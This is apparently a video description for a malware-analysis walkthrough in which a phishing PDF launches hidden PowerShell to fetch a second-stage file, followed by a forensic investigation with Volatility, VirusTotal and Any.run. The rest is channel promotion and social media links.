PDF Malware Analysis with Volatility, Any.Run & VirusTotal

In this video walkthrough, we covered a cyber incident response case study that involved a malicious PDF malware delivered through a phishing email. The PDF malware once opened, spawned a powershell session in a hidden window that execute a base64 encoded command to retrieve another malicious file from a C2 server. We extracted the sample using Volatility plugins then we uploaded the sample to Virustotal and Any.run to dynamically analyze the malware and extract the related artifacts. **** Receive Cyber Security Field, Certifications Notes and Special Training Videos https://www.youtube.com/channel/UCNSdU_1ehXtGclimTVckHmQ/join ***** Register and start analyzing malwares with Any.run https://app.any.run/?utm_source=youtube&utm_medium=video&utm_campaign=motasem&utm_content=register&utm_term=300424#register/ ****** Writeup https://motasem-notes.net/en/memory-forensics-with-volatility-pdf-malware-analysis-with-any-run-cyber-incident-response/ ******** Google Profile https://maps.app.goo.gl/eLotQQb7Dm6aiL8z6 LinkedIn [1]: https://www.linkedin.com/in/motasem-hamdan-7673289b/ [2]: https://www.linkedin.com/in/motasem-eldad-ha-bb42481b2/ Instagram https://www.instagram.com/dev.stuxnet/ Twitter https://twitter.com/ManMotasem Facebook https://www.facebook.com/motasemhamdantty/